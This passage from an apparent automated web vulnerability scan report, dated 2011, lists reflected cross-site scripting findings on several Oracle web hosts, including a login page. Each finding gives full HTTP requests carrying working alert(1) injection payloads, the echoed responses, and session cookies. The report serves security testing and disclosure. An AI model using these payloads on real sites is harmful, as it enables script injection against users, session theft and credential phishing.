This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/search?group=Events&keyword=OPN+Only&af082"-alert(1)-"d619d29c89f=1 HTTP/1.1
Host: events.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Language: en
X-Oracle-DMS-ECID: 992358339461188
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.4.0 (M;max-age=900+0;age=1;ecid=992358339461188,0:1)
Date: Mon, 17 Oct 2011 02:33:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 163786


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xml:lang="en" xmlns="http://www.w3.o
...[SNIP]...
;
var username = "";
var hitCountqueryList = new Array();
var sort = "";
var isEmptyResult = false;


queryString = "group=Events&keyword=OPN+Only&af082"-alert(1)-"d619d29c89f=1";
datagroup = "Events";
recencyHits = "200";
paginationCount = recencyHits;
pageHitCount = "10";
var countIndex = 0;
hitCountqueryList[countIndex] = 'Date:"This Week":"
...[SNIP]...

3.6. http://events.oracle.com/search/search [pageHitCount parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.oracle.com
Path:   /search/search

Issue detail

The value of the pageHitCount request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4469b"-alert(1)-"c2db3255890 was submitted in the pageHitCount parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/search?start=&pageHitCount=104469b"-alert(1)-"c2db3255890&group=Events&keyword=Developer HTTP/1.1
Host: events.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Language: en
X-Oracle-DMS-ECID: 1363623902462247
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.4.0 (M;max-age=900+0;age=1;ecid=1363623902462247,0:1)
Date: Mon, 17 Oct 2011 02:34:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 168176


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xml:lang="en" xmlns="http://www.w3.o
...[SNIP]...
= 10;
var username = "";
var hitCountqueryList = new Array();
var sort = "";
var isEmptyResult = false;


queryString = "start=&pageHitCount=104469b"-alert(1)-"c2db3255890&group=Events&keyword=Developer";
datagroup = "Events";
recencyHits = "200";
paginationCount = recencyHits;
pageHitCount = "10";
var countIndex = 0;
hitCountqueryList[coun
...[SNIP]...

3.7. http://events.oracle.com/search/search [start parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.oracle.com
Path:   /search/search

Issue detail

The value of the start request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b58d4"-alert(1)-"2d3b993af9e was submitted in the start parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/search?start=b58d4"-alert(1)-"2d3b993af9e&pageHitCount=10&group=Events&keyword=Developer HTTP/1.1
Host: events.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Language: en
X-Oracle-DMS-ECID: 1363383384271099
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.4.0 (M;max-age=900+0;age=2;ecid=1363383384271099,0:1)
Date: Mon, 17 Oct 2011 02:33:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 168176


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xml:lang="en" xmlns="http://www.w3.o
...[SNIP]...
r pageHitCount = 10;
var username = "";
var hitCountqueryList = new Array();
var sort = "";
var isEmptyResult = false;


queryString = "start=b58d4"-alert(1)-"2d3b993af9e&pageHitCount=10&group=Events&keyword=Developer";
datagroup = "Events";
recencyHits = "200";
paginationCount = recencyHits;
pageHitCount = "10";
var countIndex = 0;
hitCou
...[SNIP]...

3.8. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /oam/server/sso/auth_cred_submit

Issue detail

The value of the request_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd99f"><script>alert(1)</script>156227c12b7d46e5a was submitted in the request_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /oam/server/sso/auth_cred_submit?v=v1.4&request_id=1464845504205588723dd99f"><script>alert(1)</script>156227c12b7d46e5a&OAM_REQ=VERSION_4%7EKk%252fxScRUpoZ7Ai84IFFZnAZ9XxsM1Ii8iVy4UnLMUA09vIONA1373ptUbdDbWK1I3N9QNYGFUjCSDxp0GzHunzGq%252fvmBT1AU8oHT9wFSl9DhSVwOc2bfDcq7LD59f1pwdrf60S8Oivf7mVNr7alnL1Y3Sw50MgkaU7G2InSL%252feSMXvUldYK4Xq6LYEVxGcoV8Oj7hjvqjGj3hERxluTMK9hpnjmyb2Tk07YmocZNna4FxugOHB517XKtT%252fhaXTLMieDHBjvDwrGcViEAuwE3GGvqWHpuTojl5qy34QNEhdC2djIdXUMOOmAtwhL%252fnG5Hf4P8HHsu8xQRQXzqFuw84IXhviZOqiPdimSKrmZCieHw4KTU3U8bBdV2drUyWdG378btaVemyIYaZOdzeBbTvfwcaUzD9k05FpVqsOA1jZvM3qh5bvAxKZSjUDGkDttGtr1sIAaYM1rP2nqFHuuMqwqR3km%252frvNP6j1XKepoasyMK%252bl4o87mnMse%252fqKzFar57xv2Pu9GhinKV9eC9AqmY1EoqooHgPYBfdaJYtP%252b8vq8Q03DrhV2gF4OQ1Blwo7PeGZm6eT3qroQciufBCbFtk%252bK%252bryEpRISC%252fUxzlvibTvHxEwBzmYzGGjMajUTjIySuHKTuAjlXzmZwqCCG9kyOVJTFeDytRZonfbzYPfwQn1bCksfHikUBKxfeTpILYCfOPauIsDlLzU7igcS2C129VHXkTmStdbkw3svRNbymzA6g900o2UuOS2%252b3PvGBe8Vr70T0tGySawSF8nw7VDpEdA%252f4016lkQEFG0Kz2rqHLThxxny1YUHiojfF7e8%252bc29JoIcf5GGkBAVFby%252fRLMJkw%252fxBng0ZwigYYTBgkYryhaIACiR4p1cCGUOM9nnHqxf8IZsuZ8wXTZmTq0pvKW6RvGMpTILIrTUkAeqw5pB4Y%252bA9AbThuC2czrtDDIjdbpN46gH7DRUCiLsF6cKHg4e7W1%252b2HzQh3XzdVUM07DXzsVkW9nWT27KrAl3daALlzhEXfwlWFnVVSq1CuxSwykwAKv7xOeerBTFP1v9FJ5am%252bS%252bFCcwxOYl%252fLbVPnH8W4W208y9yReZfI9LukLQOVQBhI1NRh7TjG8uSqdHYO9j7qbMyUU2zmSjHQ3DVMJKp0Q0vkn6MxB0qJTuqIwTw0N8kdjrWSPuUN%252b5EG5V77IonzQyQYgDGA2vUMYGRFpxoZpnaHcMPlVQsF2Pr2k0d9hnkhbfeNmtBne181Z%252fw%252bSqqxgf2Tf%252bWYZeD2cvBgi6Yum0Rcw0pCx9p3NO7JFNyzF6w5VC2bFTE8itydCcFgGxAPkHa2wGZwYajF9frJxMVWiMqX776pdrbWY6brbU7xR4T%252blBgbEAJECkda7MDx3qXQ5pthDDovBGSs8homOrAI9drwCc%252fMai6Iu%252bc0oupb1SrHu5ehssn8fb2hx85XWS7KjtQx%252flgK%252f4cJ5iwfUv%252foGbRf%252b51Cgu%252bcU%252fZo9FInI1cAlxJzSfic7vuexGzPMC0EJkxGU2I6FLYAGWQRHcs93nxDVoJuSWjVcxgqI07XzAyVP7kWOLQqY2CJ8wNRzEcLNpOwrk86njQd9uDpThjxgZAZPs7PEWaz4MdaRkI2TlKV59hVNx%252fKc%252f%252fwuhOr2S6hWRclY72NSbCsIuYhc1KsnbwSvrBm1ltsBVC5ts20PiPkNA9ThQgIrbnvayfI3TdHvsWeo8tSv03Gbmd%252bhkbWmJrG1fQcYOrNdvIaNp10KtPz5Qx0jByU%252fET8RdVEcMwt8%253d&site2pstoretoken=v1.2%7EF5A2A848%7EFB22261949B0A2AE047092711E2A4E909D2DFEFC980F5290E48C0DE280576CB3BFB570115B2C0482F8CA88B112822F977BEB18CDB1B65E2748F527C79B791081928AE624D358C294FCC1F4F25E2AA010784959BF568194859B48BE4209B5A5078679DCD9FF6D0D335464BFADF215BB6DE9CFFE08D99416F668574BB14AB7CF1CCBA74B50518E1EB936622EC0F7B3C8C74C33BC41A91B969C50AFDFD9BDF985AA0567D6BCF6DB4AD2DD2B3352DEA8AC8804AF4F669091C9C0EDCCB1813C341AB7F8F88251C1EE697D28D1FE75CE015F59690BBA990B6F5F7B10EEFD565876FEFEF9302C83C8880A4C2C5522C46636A927F7E2C6C7F3DF9D9F474A3E24D1D09AE5&locale=&ssousername=xss&password=xss HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://login.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:48:46 GMT
X-ORACLE-DMS-ECID: 0000JCHhaZZ6MQK6EVaAUS1EaweP001pXu
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:48:46 GMT; path=/
Content-Length: 2625

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...
<input type="hidden" name="request_id" value="1464845504205588723dd99f"><script>alert(1)</script>156227c12b7d46e5a">
...[SNIP]...

3.9. https://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://oraclestore.oracle.com
Path:   /OA_HTML/ibeCZzpHome.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 5f53e%20style%3dx%3aexpression(alert(1))%2045b8a85c5c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5f53e style=x:expression(alert(1)) 45b8a85c5c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /OA_HTML/ibeCZzpHome.jsp?5f53e%20style%3dx%3aexpression(alert(1))%2045b8a85c5c6=1 HTTP/1.1
Host: oraclestore.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSI=6vQxEwBAKlJ6zDEXm9WKdGwsu9; domain=.oracle.com; path=/
Set-Cookie: GSI_pses=ZGF8156A6912BB23783F3DB5DA50E8D51B3415A9AB063C5CE811A9EE7E58F0901A440CFA22669C7189C4DE34B781F50877; expires=Fri, 16-Dec-2011 02:34:26 GMT; path=/OA_HTML
Connection: Close
Date: Mon, 17 Oct 2011 02:34:26 GMT
Set-Cookie: BIGipServergsiap_store_http=1510838925.5150.0000; path=/
Content-Length: 30080


<!-- $Header: ibeCCtdMinisites.jsp 120.12.12010000.5 2010/02/15 11:20:58 amaheshw ship $ -->


<!-- $Header: ibeCZzpHea
...[SNIP]...
<a href=ibeCZzdMinisites.jsp?language=KO&ref=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp?5f53e style=x:expression(alert(1)) 45b8a85c5c6=1>
...[SNIP]...

3.10. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwsbr_javascript.page_js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /portal/pls/portal/PORTAL.wwsbr_javascript.page_js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eb7eb<img%20src%3da%20onerror%3dalert(1)>016ce9558a8 was submitted in the REST URL parameter 3. This input was echoed as eb7eb<img src=a onerror=alert(1)>016ce9558a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /portal/pls/portaleb7eb<img%20src%3da%20onerror%3dalert(1)>016ce9558a8/PORTAL.wwsbr_javascript.page_js?p_language=us&p_version=10.1.4.1.0.113 HTTP/1.1
Host: solutions.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://solutions.oracle.com/home/basic_search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; gpv_p24=no%20value; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=ISO-8859-1
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=109260035617,0)
Content-Length: 295
Date: Mon, 17 Oct 2011 12:05:09 GMT
Content-Location: /servlet/RepositoryServlet/portaleb7eb%3Cimg%20src%3Da%20onerror%3Dalert(1)%3E016ce9558a8/PORTAL.wwsbr_javascript.page_js

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>DAD "portaleb7eb<img src=a onerror=alert(1)>016ce9558a8" not found in URL (http://solutions.oracle.com/portal/pls/portaleb7eb<img%20src%3da%20onerror%3dalert(1)>
...[SNIP]...

3.11. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwui_api_body.render_wizard_css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /portal/pls/portal/PORTAL.wwui_api_body.render_wizard_css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 61cec<img%20src%3da%20onerror%3dalert(1)>2d0367c2b49 was submitted in the REST URL parameter 3. This input was echoed as 61cec<img src=a onerror=alert(1)>2d0367c2b49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /portal/pls/portal61cec<img%20src%3da%20onerror%3dalert(1)>2d0367c2b49/PORTAL.wwui_api_body.render_wizard_css?p_bg_color=FFFFFF&p_is_bidi=0&p_version=10.1.4.1.0.113 HTTP/1.1
Host: solutions.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_basedm.show_translations?p_masterthingid=7668639&p_item_siteid=53&p_pageid=7668625&p_page_siteid=53&p_back_url=http%3A%2F%2Fsolutions.oracle.com%2Fsolutions%2Fbmg%2Fconsulting
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=ISO-8859-1
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=126440607374,1)
Content-Length: 302
Date: Mon, 17 Oct 2011 12:16:35 GMT
Content-Location: /servlet/RepositoryServlet/portal61cec%3Cimg%20src%3Da%20onerror%3Dalert(1)%3E2d0367c2b49/PORTAL.wwui_api_body.render_wizard_css

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>DAD "portal61cec<img src=a onerror=alert(1)>2d0367c2b49" not found in URL (http://solutions.oracle.com/portal/pls/portal61cec<img%20src%3da%20onerror%3dalert(1)>
...[SNIP]...

3.12. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_basedm.show_translations [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /portal/pls/portal/PORTAL.wwv_basedm.show_translations

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1b200<img%20src%3da%20onerror%3dalert(1)>968676e5d39 was submitted in the REST URL parameter 3. This input was echoed as 1b200<img src=a onerror=alert(1)>968676e5d39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /portal/pls/portal1b200<img%20src%3da%20onerror%3dalert(1)>968676e5d39/PORTAL.wwv_basedm.show_translations?p_masterthingid=7668639&p_item_siteid=53&p_pageid=7668625&p_page_siteid=53&p_back_url=http%3A%2F%2Fsolutions.oracle.com%2Fsolutions%2Fbmg%2Fconsulting HTTP/1.1
Host: solutions.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://solutions.oracle.com/solutions/bmg/consulting
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=ISO-8859-1
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=87786108576,1)
Content-Length: 299
Date: Mon, 17 Oct 2011 12:19:57 GMT
Content-Location: /servlet/RepositoryServlet/portal1b200%3Cimg%20src%3Da%20onerror%3Dalert(1)%3E968676e5d39/PORTAL.wwv_basedm.show_translations

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>DAD "portal1b200<img src=a onerror=alert(1)>968676e5d39" not found in URL (http://solutions.oracle.com/portal/pls/portal1b200<img%20src%3da%20onerror%3dalert(1)>
...[SNIP]...

3.13. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_javascript.fetch_script [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /portal/pls/portal/PORTAL.wwv_javascript.fetch_script

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 32e1e<img%20src%3da%20onerror%3dalert(1)>7b624fc905f was submitted in the REST URL parameter 3. This input was echoed as 32e1e<img src=a onerror=alert(1)>7b624fc905f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /portal/pls/portal32e1e<img%20src%3da%20onerror%3dalert(1)>7b624fc905f/PORTAL.wwv_javascript.fetch_script?p_name=search_form&p_dynamic=y&p_language=us HTTP/1.1
Host: solutions.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://solutions.oracle.com/home/basic_search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; gpv_p24=no%20value; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=ISO-8859-1
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=165094625768,0)
Content-Length: 298
Date: Mon, 17 Oct 2011 12:05:24 GMT
